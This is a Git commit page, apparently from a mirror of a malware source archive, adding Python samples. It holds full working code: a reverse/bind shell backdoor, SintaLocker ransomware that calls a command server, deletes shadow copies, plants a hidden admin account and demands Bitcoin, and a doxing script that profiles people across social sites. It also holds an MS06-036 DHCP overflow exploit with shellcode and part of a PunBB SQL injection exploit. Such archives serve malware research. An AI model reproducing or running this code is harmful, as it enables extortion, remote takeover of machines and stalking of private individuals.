daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 08:19:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2020-10-09 22:09:52 -05:00
committed by GitHub
parent f5ec68af9b
commit 9cbdb38457
17 changed files with 2998 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Python/AngstStealer.7z
BIN
View File
Binary file not shown.
Python/Aris.7z
BIN
View File
Binary file not shown.
Python/Backdoor.Python.RShell
+121
View File
@@ -0,0 +1,121 @@
#!/usr/bin/env python
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
# #
# alpha #
# #
# #
# usage: #
# % ./d00r -b password port #
# % ./d00r -r password port host #
# % nc host port #
# % nc -l -p port (please use netcat) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import os, sys, socket, time
# =================== var =======
MAX_LEN=1024
SHELL="/bin/zsh -c"
TIME_OUT=300 #s
PW=""
PORT=""
HOST=""
# =================== funct =====
# shell - exec command, return stdout, stderr; improvable
def shell(cmd):
sh_out=os.popen(SHELL+" "+cmd).readlines()
nsh_out=""
for i in range(len(sh_out)):
nsh_out+=sh_out[i]
return nsh_out
# action?
def action(conn):
conn.send("\nPass?\n")
try: pw_in=conn.recv(len(PW))
except: print "timeout"
else:
if pw_in == PW:
conn.send("j00 are on air!\n")
while True:
conn.send(">>> ")
try:
pcmd=conn.recv(MAX_LEN)
except:
print "timeout"
return True
else:
#print "pcmd:",pcmd
cmd=""#pcmd
for i in range(len(pcmd)-1):
cmd+=pcmd[i]
if cmd==":dc":
return True
elif cmd==":sd":
return False
else:
if len(cmd)>0:
out=shell(cmd)
conn.send(out)
# =================== main ======
argv=sys.argv
if len(argv)<4:
print "error; help: head -n 16 d00r.py"
sys.exit(1)
elif argv[1]=="-b":
PW=argv[2]
PORT=argv[3]
elif argv[1]=="-r" and len(argv)>4:
PW=argv[2]
PORT=argv[3]
HOST=argv[4]
else: exit(1)
PORT=int(PORT)
print "PW:",PW,"PORT:",PORT,"HOST:",HOST
#sys.argv[0]="d00r"
# exit father proc
if os.fork()!=0:
sys.exit(0)
# associate the socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if argv[1]=="-b":
sock.bind(('localhost', PORT))
sock.listen(0)
run=True
while run:
if argv[1]=="-r":
try: sock.connect( (HOST, PORT) )
except:
print "host unreachable"
time.sleep(5)
else: run=action(sock)
else:
try: (conn,addr)=sock.accept()
except:
print "timeout"
time.sleep(1)
else: run=action(conn)
# shutdown the sokcet
if argv[1]=="-b": conn.shutdown(2)
else:
try: sock.send("")
except: time.sleep(1)
else: sock.shutdown(2)
Python/CryPy_Source.py
+463
View File
@@ -0,0 +1,463 @@
import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2
import SintaRegistery
import SintaChangeWallpaper
from Crypto import Random
from Crypto.Cipher import AES
rmsbrand = 'SintaLocker'
newextns = 'sinta'
encfolder = '__SINTA I LOVE YOU__'
email_con = 'sinpayy@yandex.com'
btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1'
userhome = os.path.expanduser('~')
my_server = 'http://www.dobrebaseny.pl/js/lib/srv/'
wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg'
victim_info = base64.b64encode(str(platform.uname()))
configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname()))
glob_config = None
try:
glob_config = json.loads(urllib.urlopen(configurl).read())
if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']):
raise Exception('0x00001')
except IOError:
time.sleep(1)
victim_id = glob_config[u'MRU_ID']
victim_r = glob_config[u'MRU_UDP']
victim_s = glob_config[u'MRU_PDP']
try:
os.system('bcdedit /set {default} recoveryenabled No')
os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f')
except WindowsError:
pass
def setWallpaper(imageUrl):
try:
wallpaper = SintaChangeWallpaper.ChangeWallpaper()
wallpaper.downloadWallpaper(imageUrl)
except:
pass
def persistance():
try:
SintaRegistery.addRegistery(os.path.realpath(__file__))
except:
pass
def destroy_shadow_copy():
try:
os.system('vssadmin Delete Shadows /All /Quiet')
except:
pass
def create_remote_desktop():
try:
os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f')
os.system('net user ' + victim_r + ' ' + victim_s + ' /add')
os.system('net localgroup administrators ' + victim_r + ' /add')
except:
pass
def write_instruction(dir, ext):
try:
files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w')
files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '')
except:
pass
def delete_file(filename):
try:
os.remove(filename)
except:
pass
def find_files(root_dir):
write_instruction(root_dir, 'md')
extentions = ['*.txt',
'*.exe',
'*.php',
'*.pl',
'*.7z',
'*.rar',
'*.m4a',
'*.wma',
'*.avi',
'*.wmv',
'*.csv',
'*.d3dbsp',
'*.sc2save',
'*.sie',
'*.sum',
'*.ibank',
'*.t13',
'*.t12',
'*.qdf',
'*.gdb',
'*.tax',
'*.pkpass',
'*.bc6',
'*.bc7',
'*.bkp',
'*.qic',
'*.bkf',
'*.sidn',
'*.sidd',
'*.mddata',
'*.itl',
'*.itdb',
'*.icxs',
'*.hvpl',
'*.hplg',
'*.hkdb',
'*.mdbackup',
'*.syncdb',
'*.gho',
'*.cas',
'*.svg',
'*.map',
'*.wmo',
'*.itm',
'*.sb',
'*.fos',
'*.mcgame',
'*.vdf',
'*.ztmp',
'*.sis',
'*.sid',
'*.ncf',
'*.menu',
'*.layout',
'*.dmp',
'*.blob',
'*.esm',
'*.001',
'*.vtf',
'*.dazip',
'*.fpk',
'*.mlx',
'*.kf',
'*.iwd',
'*.vpk',
'*.tor',
'*.psk',
'*.rim',
'*.w3x',
'*.fsh',
'*.ntl',
'*.arch00',
'*.lvl',
'*.snx',
'*.cfr',
'*.ff',
'*.vpp_pc',
'*.lrf',
'*.m2',
'*.mcmeta',
'*.vfs0',
'*.mpqge',
'*.kdb',
'*.db0',
'*.mp3',
'*.upx',
'*.rofl',
'*.hkx',
'*.bar',
'*.upk',
'*.das',
'*.iwi',
'*.litemod',
'*.asset',
'*.forge',
'*.ltx',
'*.bsa',
'*.apk',
'*.re4',
'*.sav',
'*.lbf',
'*.slm',
'*.bik',
'*.epk',
'*.rgss3a',
'*.pak',
'*.big',
'*.unity3d',
'*.wotreplay',
'*.xxx',
'*.desc',
'*.py',
'*.m3u',
'*.flv',
'*.js',
'*.css',
'*.rb',
'*.png',
'*.jpeg',
'*.p7c',
'*.p7b',
'*.p12',
'*.pfx',
'*.pem',
'*.crt',
'*.cer',
'*.der',
'*.x3f',
'*.srw',
'*.pef',
'*.ptx',
'*.r3d',
'*.rw2',
'*.rwl',
'*.raw',
'*.raf',
'*.orf',
'*.nrw',
'*.mrwref',
'*.mef',
'*.erf',
'*.kdc',
'*.dcr',
'*.cr2',
'*.crw',
'*.bay',
'*.sr2',
'*.srf',
'*.arw',
'*.3fr',
'*.dng',
'*.jpeg',
'*.jpg',
'*.cdr',
'*.indd',
'*.ai',
'*.eps',
'*.pdf',
'*.pdd',
'*.psd',
'*.dbfv',
'*.mdf',
'*.wb2',
'*.rtf',
'*.wpd',
'*.dxg',
'*.xf',
'*.dwg',
'*.pst',
'*.accdb',
'*.mdb',
'*.pptm',
'*.pptx',
'*.ppt',
'*.xlk',
'*.xlsb',
'*.xlsm',
'*.xlsx',
'*.xls',
'*.wps',
'*.docm',
'*.docx',
'*.doc',
'*.odb',
'*.odc',
'*.odm',
'*.odp',
'*.ods',
'*.odt',
'*.sql',
'*.zip',
'*.tar',
'*.tar.gz',
'*.tgz',
'*.biz',
'*.ocx',
'*.html',
'*.htm',
'*.3gp',
'*.srt',
'*.cpp',
'*.mid',
'*.mkv',
'*.mov',
'*.asf',
'*.mpeg',
'*.vob',
'*.mpg',
'*.fla',
'*.swf',
'*.wav',
'*.qcow2',
'*.vdi',
'*.vmdk',
'*.vmx',
'*.gpg',
'*.aes',
'*.ARC',
'*.PAQ',
'*.tar.bz2',
'*.tbk',
'*.bak',
'*.djv',
'*.djvu',
'*.bmp',
'*.cgm',
'*.tif',
'*.tiff',
'*.NEF',
'*.cmd',
'*.class',
'*.jar',
'*.java',
'*.asp',
'*.brd',
'*.sch',
'*.dch',
'*.dip',
'*.vbs',
'*.asm',
'*.pas',
'*.ldf',
'*.ibd',
'*.MYI',
'*.MYD',
'*.frm',
'*.dbf',
'*.SQLITEDB',
'*.SQLITE3',
'*.asc',
'*.lay6',
'*.lay',
'*.ms11 (Security copy)',
'*.sldm',
'*.sldx',
'*.ppsm',
'*.ppsx',
'*.ppam',
'*.docb',
'*.mml',
'*.sxm',
'*.otg',
'*.slk',
'*.xlw',
'*.xlt',
'*.xlm',
'*.xlc',
'*.dif',
'*.stc',
'*.sxc',
'*.ots',
'*.ods',
'*.hwp',
'*.dotm',
'*.dotx',
'*.docm',
'*.DOT',
'*.max',
'*.xml',
'*.uot',
'*.stw',
'*.sxw',
'*.ott',
'*.csr',
'*.key',
'wallet.dat']
for dirpath, dirs, files in os.walk(root_dir):
if 'Windows' not in dirpath:
for basename in files:
for ext in extentions:
if fnmatch.fnmatch(basename, ext):
filename = os.path.join(dirpath, basename)
yield filename
def make_directory(file_path):
directory = file_path + '' + encfolder
if not os.path.exists(directory):
try:
os.makedirs(directory)
except:
pass
def text_generator(size = 6, chars = string.ascii_uppercase + string.digits):
return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns
def generate_file(file_path, filename):
make_directory(file_path)
key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])
newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm')
try:
encrypt_file(key, filename, newfilename)
except:
pass
def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16):
if not out_filename:
out_filename = newfilename
iv = ''.join((chr(random.randint(0, 255)) for i in range(16)))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
listdir = (userhome + '\\Contacts\\',
userhome + '\\Documents\\',
userhome + '\\Downloads\\',
userhome + '\\Favorites\\',
userhome + '\\Links\\',
userhome + '\\My Documents\\',
userhome + '\\My Music\\',
userhome + '\\My Pictures\\',
userhome + '\\My Videos\\',
'D:\\',
'E:\\',
'F:\\',
'G:\\',
'I:\\',
'J:\\',
'K:\\',
'L:\\',
'M:\\',
'N:\\',
'O:\\',
'P:\\',
'Q:\\',
'R:\\',
'S:\\',
'T:\\',
'U:\\',
'V:\\',
'W:\\',
'X:\\',
'Y:\\',
'Z:\\')
for dir_ in listdir:
for filename in find_files(dir_):
generate_file(dir_, filename)
delete_file(filename)
persistance()
destroy_shadow_copy()
create_remote_desktop()
write_instruction(userhome + '\\Desktop\\', 'txt')
os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt')
setWallpaper(wallpaper_link)
Python/Doxing-Script-Py3.py
+336
View File
@@ -0,0 +1,336 @@
import os
import requests
import sys
import subprocess
import re
import face_recognition
import json
done_checks = []
social_media = []
usernames = []
emails = []
twitter = []
instagram = []
steam = []
urls = []
urls_stalk = []
urls_done = []
name = ""
adresse = ""
compare = False
first_dl = False
def stalk(user):
if len(user) > 1:
global urls_stalk
pastebin_url = "https://pastebin.com/u/" + user
pastebin_str = "s Pastebin - Pastebin.com"
patreon_url = "https://www.patreon.com/" + user
patreon_str = 'created_at'
gutefrage_url = "https://www.gutefrage.net/nutzer/" + user
gutefrage_str = '<meta name="title" content="Profil von'
ebay_url = "https://www.ebay.de/usr/" + user
ebay_str = '<span>Angemeldet seit: </span>'
twitter_url = "https://twitter.com/" + user
twitter_str = '<link rel="canonical" href="https://twitter.com/' + user + '">'
facebook_url = 'https://facebook.com/' + user
facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user
instagram_url = "https://www.instagram.com/" + user + "/"
instagram_str = '<link rel="alternate" href="https://www.instagram.com/' + user + '/?hl=en" hreflang="en" />'
steam_url = "https://steamcommunity.com/id/" + user
steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif'
twitch_url = "https://www.twitch.tv/" + user
twitch_str = "content='twitch://stream/" + user
lachschon_url = "https://www.lachschon.de/community/user/" + user + "/"
lachschon_str = '<label>Rang</label>'
URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url]
STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str]
for i in range(0, len(URLS)):
html = getResponse(URLS[i])
if STRS[i].lower() in str(html).lower():
print("\t> " + URLS[i])
urls_stalk.append(URLS[i])
def get_twitter_img(user):
url = "https://twitter.com/" + user
html = subprocess.getoutput("phantomjs html.js " + url)
image = find_between(html, '<img class="ProfileAvatar-image " src="', '" alt="')
r = requests.get(image)
with open('Twitter.jpg', 'wb') as f:
f.write(r.content)
def get_instagram_img(user):
data = {
'username': user,
'submit': 'View DP'
}
response = requests.post('https://fullinstadp.com/index.php', data=data)
html = response.text
f = open("Out.html", "w")
f.write(html)
f.close
img_url = find_between(html, '<img class="loading img-rounded center-block img-responsive" src="', '" alt=""')
r = requests.get(img_url)
with open('Instagram.jpg', 'wb') as f:
f.write(r.content)
def check_mail(string):
EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
if EMAIL_REGEX.match(string):
return True
else:
return False
def check_string_mail(string):
global emails
splitted = string.split(" ")
for word in splitted:
if check_mail(word):
emails.append(word)
def check_string_url(string):
global urls
for word in string.split(" "):
try:
url = re.search("(?P<url>https?://[^\s]+)", word).group("url")
if '//t.co/' in url:
last = url[-1:]
if last == ".":
url = url.rstrip('.')
r = requests.get(url)
url = r.url
urls.append(url)
except:
e = ""
def check_string_socialmedia(string):
global social_media
count = 0
next = 0
for word in string.split(" "):
next = count + 2
if 'facebook' in word.lower():
print(string.split(" ")[next])
count +=1
def youtube(url):
url = url + "/about"
html = subprocess.getoutput("phantomjs html.js " + url)
tmp_str = html.split('"}},"urlEndpoint":')
for url in tmp_str:
#print(url)
url = find_between(url, '{"url":"', '","target":')
print(html)
def grab_instagram(profile):
global done_checks
global urls
global instagram
global usernames
global compare
if not "instagram: " + profile in done_checks:
if not profile in usernames:
usernames.append(profile)
url = "https://www.instagram.com/" + profile + "/"
html = subprocess.getoutput("phantomjs html.js " + url)
if '"@type":"Person","name":"' in html:
display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"')
if not display_name in usernames:
usernames.append(display_name)
if not "instagram: " + display_name in done_checks:
print(display_name)
stalk(display_name)
instagram.append("Display Name: " + display_name)
description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer')
follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer')
check_string_mail(description)
check_string_url(description)
instagram.append("Description: " + description)
instagram.append("Follower: " + follower)
#get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion
compare = True
if not "instagram: " + profile in done_checks:
done_checks.append("instagram: " + profile)
def grab_steam(url):
global done_checks
global urls
global usernames
if not "steam: " + profile in done_checks:
url = url + "/ajaxaliases/"
response = requests.get(url)
html = response.text
for item in html.split("newname"):
username = find_between(item, '":"', '","timechanged')
if not username in usernames:
usernames.append(username)
def grab_twitter(profile):
global done_checks
global urls
global adresse
global usernames
global twitter
global first_dl
if not "twitter: " + profile in done_checks:
url = "https://twitter.com/" + profile
urls.append(url)
html = subprocess.getoutput("phantomjs html.js " + url)
#variables
display_name = find_between(html, '<title>', ' (@')
if not profile in usernames:
usernames.append(profile)
if not display_name in usernames:
usernames.append(display_name)
if not "twitter: " + display_name in done_checks:
print(display_name)
stalk(display_name)
join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten')
description = ""
url = ""
location = ""
#if
if '<meta name="description"' in html:
description = find_between(html, '<meta name="description" content="', '">')
description = description.replace("&quot", "")
check_string_mail(description)
check_string_url(description)
if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html:
tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>')
url = find_between(tmp, '" title="', '">')
urls.append(url)
if 'location&quot;:&quot;' in html:
location = find_between(html, '&quot;location&quot;:&quot;', '&quot;,&quot;url')
if len(location) > 0:
adresse = location
twitter.append("Display Name: " + display_name)
twitter.append("Join Date: " + join_date)
twitter.append("Description: " + description)
twitter.append("URL: " + url)
twitter.append("Location: " + location)
twitter.append(" ")
#if first_dl == False:
#get_twitter_img(profile)
#first_dl = True
if not "twitter: " + profile in done_checks:
done_checks.append("twitter: " + profile)
def handle():
try:
if sys.argv[1]:
social_media = sys.argv[1].lower()
if sys.argv[2]:
info_type = sys.argv[2].lower()
if sys.argv[3]:
infos = sys.argv[3].lower()
if info_type == "url":
if social_media == "youtube":
youtube(infos)
elif info_type == "profile":
if social_media == "twitter":
grab_twitter(infos)
elif info_type == "user":
if social_media == "stalk":
stalk(infos)
except Exception as e:
print(e)
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def getResponse(url):
response = requests.get(url)
#response.raise_for_status()
data = response.content
return data
handle()
for url in urls_stalk:
#print(url)
if 'twitter.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "twitter: " + profile:
checked = True
if not checked:
grab_twitter(profile)
done_checks.append("twitter:" + profile)
if 'instagram.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "instagram: " + profile:
checked = True
if not checked:
grab_instagram(profile)
#print("Download Profile Picture")
done_checks.append("instagram: " + profile)
#Steam Check direkt in der Stalk Funktion
if 'steamcommunity.com' in url:
checked = False
profile = url.split("/")[4]
for check in done_checks:
if check == "steam: " + profile:
checked = True
if not checked:
grab_steam(url)
done_checks.append("steam: " + profile)
print("------------------")
print("Usernames:")
print("------------------")
for user in usernames:
print(user)
stalk(user)
if len(urls) > 0:
print("------------------")
print("URLs:")
print("------------------")
for url in urls:
print(url)
if len(twitter) > 0:
print("------------------")
print("Twitter:")
print("------------------")
for item in twitter:
print(item)
if len(instagram) > 0:
print("------------------")
print("Instagram:")
print("------------------")
for item in instagram:
print(item)
if len(steam) > 0:
print("------------------")
print("Steam:")
print("------------------")
for item in steam:
print(item)
print("------------------")
print("Sites checked:")
print("------------------")
for check in done_checks:
print(check)
Python/Exploit.Python.Ms06-036.a
+237
View File
@@ -0,0 +1,237 @@
#!/usr/bin/env python
#
#
# by redsand@blacksecurity.org
# this (like any thing) would not be possible w/out the bl4ck team.
# thanks guys.
#
import sys, os
sys.path.append("pydhcplib")
from scapy import *
from pydhcplib.dhcp_packet import *
from pydhcplib.dhcp_network import *
from pydhcplib.type_strlist import *
from pydhcplib.type_ipv4 import *
from pydhcplib.type_hw_addr import *
inet_face = "vmnet8"
default_ip = "10.31.33.7"
# user bl4ck/bl4ck
# this exits via Thread (so thta we kill the dhcp thread in services.exe
#
# this means if services doesn't crash, it was a successful exploit
#
scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
netopt = {'client_listen_port':"68",
'server_listen_port':"67",
'listen_address':"0.0.0.0"}
def substr(i,o,off):
begin=i[:off]
end=i[off+len(o):]
ret=begin+o+end
return ret
def io(i):
str=""
a=chr(i % 256)
i=i >> 8
b=chr(i % 256)
i=i >> 8
c=chr(i % 256)
i=i >> 8
d=chr(i % 256)
str+="%c%c%c%c" % (a,b,c,d)
return str
class Server(DhcpServer):
def __init__(self, options):
DhcpServer.__init__(self,options["listen_address"],
options["client_listen_port"],
options["server_listen_port"])
def HandleDhcpDiscover(self, packet):
my_reqip = ''
my_reqip = default_ip
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received discover from %s (%s)" % (mymac,my_reqip)
mpacket = DhcpPacket()
mpacket.CreateDhcpOfferPacketFrom(packet)
mpacket.SetOption("dhcp_message_type",[2])
mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
mpacket.SetOption("siaddr", ipv4(server_ip).list())
mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
mpacket.SetOption("flags",[0,0])
mpacket.SetOption("server_identifier", ipv4(server_ip).list())
mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
mpacket.SetOption("router",ipv4(our_ip).list())
mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')
print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
sendp(p, iface=inet_face, verbose=False)
def HandleDhcpRequest(self, packet):
ip = packet.GetOption("request_ip_address")
sid = packet.GetOption("server_identifier")
ciaddr = packet.GetOption("ciaddr")
my_reqip = ''
try:
data = packet.options_data['request_ip_address']
for i in range(0,len(data),4) :
if len(data[i:i+4]) == 4 :
my_reqip += ipv4(data[i:i+4]).str()
except:
my_reqip = default_ip
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received request from %s (%s)" % (my_reqip,mymac)
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mypacket = DhcpPacket()
mypacket.CreateDhcpAckPacketFrom(packet)
mypacket.SetOption("yiaddr", ipv4(my_reqip).list())
dumbstr = "\x90" * 0xFF
# we're looking for a jmp/call ebx ?! or landing in our codespace
# directly
# C5 converts to 253C
# BB = 2557
# AA = 00AC
# DD = 258C
# EE = 03B5
# 88 = 00D6
# 99 = 00EA
# F3 = 2591
# B0 = 2264
# 8F = 00c5
eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
#eipstr = "C" * 0xFF
payload = "\x42" * 0xFF
payload = substr(payload, scode, 1)
## find location in heap to ret2
# find offset & append as many "\x26\x6e\x43\x6e"
# to increment ebx to a non trashed location (since ebx points to our code)
# then push ebx \x53 and \xc4 (retn)
#
# we're looking for a pop+pop+ret or a jmp/call ebx to return to our
# unicode filtered input
# note it must be iwthin the bounds of 0x0000**** - 0x0070****
# or 0x22***** <-- wont help us
append = "\x0f\xff" + ( "\x90" * 0xff )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( payload[0:254]) + "\x00"
print "Length of our attack: %r" % len(append)
eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
for i in p:
sendp(eth/i, iface=inet_face, verbose=False)
def HandleDhcpDecline(self, packet):
return
#print "** Dhcp Declined"
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpRelease(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpInform(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
print "\t by redsand@blacksecurity.org"
print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
print ""
if len(sys.argv) > 1:
inet_face = sys.argv[1]
if len(sys.argv) > 2:
default_ip = sys.argv[2]
print "Listening for client requests:\n"
print "Listening on interface: %s" % inet_face
print "Using default address: %s" % default_ip
server = Server(netopt)
while True :
server.GetNextDhcpPacket()
Python/Exploit.Python.PunBB.a
+130
View File
@@ -0,0 +1,130 @@
#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import urllib
import getopt
import sys
import string
__argv__ = sys.argv
def banner():
print "PunBB 1.2.4 - change_email SQL injection exploit"
print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage():
banner()
print "Usage:\n"
print " $ ./punbb_change_email.py [options]\n"
print " -h http_url url of the punBB forum to exploit"
print " f.e. http://www.forum.net/punBB/"
print " -u username punBB forum useraccount"
print " -p password punBB forum userpassword"
print " -e email email address where the admin leve activation email is sent"
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
print ""
sys.exit(-1)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
except getopt.GetoptError:
usage()
if len(__argv__) < 10:
usage()
username = None
password = None
email = None
domain = None
host = None
for o, arg in opts:
if o == "-h":
host = arg
if o == "-u":
username = arg
if o == "-p":
password = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg
# Printout banner
banner()
# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)
if username == None:
print "[-] username needed to continue"
sys.exit(-1)
if password == None:
print "[-] password needed to continue"
sys.exit(-1)
if email == None:
print "[-] email address needed to continue"
sys.exit(-1)
if domain == None:
